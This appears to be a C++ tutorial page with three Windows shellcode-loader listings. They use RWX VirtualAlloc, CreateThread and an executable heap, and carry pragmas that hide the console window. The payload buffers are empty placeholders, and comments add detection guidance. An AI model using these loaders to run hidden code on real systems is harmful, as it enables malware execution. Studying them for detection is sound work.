C++ 之 shellcode 加载器

VirtualAlloc申请内存

#include <windows.h>
#include <iostream>
#include <time.h>
#pragma comment (lib, "winmm.lib")

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
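/*
 * Copies the byte array `buf` into a freshly committed memory region and
 * calls that region as a function taking no arguments.
 *
 * `buf` is an empty placeholder on this page, so sizeof(buf) is 1 (only the
 * terminating NUL) and nothing meaningful is copied as written.
 *
 * Detection note: the region is requested as PAGE_EXECUTE_READWRITE and then
 * executed. Private memory that is writable and executable at the same time,
 * and not backed by a module on disk, is what memory scanners and API-level
 * telemetry look for; the sequence "VirtualAlloc RWX -> copy -> indirect
 * call" is a useful pattern to alert on.
 */
void startShellCode()
{
    unsigned char buf[] = "";

    void* exec = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        // Allocation failed: copying to and calling a null pointer would fault.
        return;
    }

    memcpy(exec, buf, sizeof(buf));
    ((void(*)())exec)();

    // Reached only if the called code returns; give the region back.
    VirtualFree(exec, 0, MEM_RELEASE);
}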

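// Entry point of the first listing. Declared `int` because `void main` is not
// valid standard C++ (it is accepted only as a compiler extension).
int main() {
    startShellCode();
    return 0;
}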
#include<windows.h>

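/*
 * Second listing: copies `buf` into a committed PAGE_EXECUTE_READWRITE region
 * and runs it on a new thread, then waits for that thread to finish.
 *
 * `buf` is an empty placeholder on this page, so shellcode_size is 1 (only
 * the terminating NUL).
 *
 * Detection note: besides the RWX allocation itself, the new thread's start
 * address lies in private memory that belongs to no loaded module. A thread
 * start address outside every image-backed region is a standard signal for
 * in-process code injection.
 *
 * Returns 0 after the thread has finished, 1 if the allocation or the thread
 * creation failed.
 */
int main()
{
	DWORD dwThreadId = 0;

	unsigned char buf[] = "";
	// SIZE_T matches the dwSize parameter of VirtualAlloc and avoids a
	// signed/unsigned conversion.
	SIZE_T shellcode_size = sizeof(buf);

	LPVOID shellcode = VirtualAlloc(
		NULL,
		shellcode_size,
		MEM_COMMIT,
		PAGE_EXECUTE_READWRITE
	);
	if (shellcode == NULL) {
		// Without this check CopyMemory would write through a null pointer.
		return 1;
	}

	// Copy the bytes into the region, which is readable, writable and executable.
	CopyMemory(shellcode, buf, shellcode_size);

	HANDLE hThread = CreateThread(
		NULL,	// security attributes (default)
		0,	// stack size (default); an integer, so 0 rather than NULL
		(LPTHREAD_START_ROUTINE)shellcode,	// start routine
		NULL,	// argument passed to the start routine
		0,	// creation flags: run immediately
		&dwThreadId
	);
	if (hThread == NULL) {
		VirtualFree(shellcode, 0, MEM_RELEASE);
		return 1;
	}

	// Block until the thread ends, then release the handle and the region.
	WaitForSingleObject(hThread, INFINITE);
	CloseHandle(hThread);
	VirtualFree(shellcode, 0, MEM_RELEASE);
	return 0;
}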

#include<Windows.h>
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//隐藏dos黑窗口

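/*
 * Third listing: same copy-and-call pattern, but the memory comes from a
 * private heap created with HEAP_CREATE_ENABLE_EXECUTE instead of from
 * VirtualAlloc.
 *
 * `buf` holds the literal text "shellcode" as a placeholder, not machine
 * code.
 *
 * Detection note: heaps created with HEAP_CREATE_ENABLE_EXECUTE are uncommon
 * in ordinary applications, so a HeapCreate call carrying that flag, followed
 * by execution from the heap, is worth flagging in API telemetry.
 *
 * Returns 0 after the called code returns, 1 if the heap or the allocation
 * could not be created.
 */
int main(void) {
	unsigned char buf[] = "shellcode";

	// Create a private heap whose allocations are executable.
	HANDLE myHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	if (myHeap == NULL) {
		return 1;
	}

	// Allocate a zero-filled block from that heap.
	void* exec = HeapAlloc(myHeap, HEAP_ZERO_MEMORY, sizeof(buf));
	if (exec == NULL) {
		// Without this check memcpy would write through a null pointer.
		HeapDestroy(myHeap);
		return 1;
	}
	memcpy(exec, buf, sizeof(buf));

	((void(*)())exec)();

	// Reached only if the called code returns; destroying the heap frees
	// the block as well.
	HeapDestroy(myHeap);
	return 0;
}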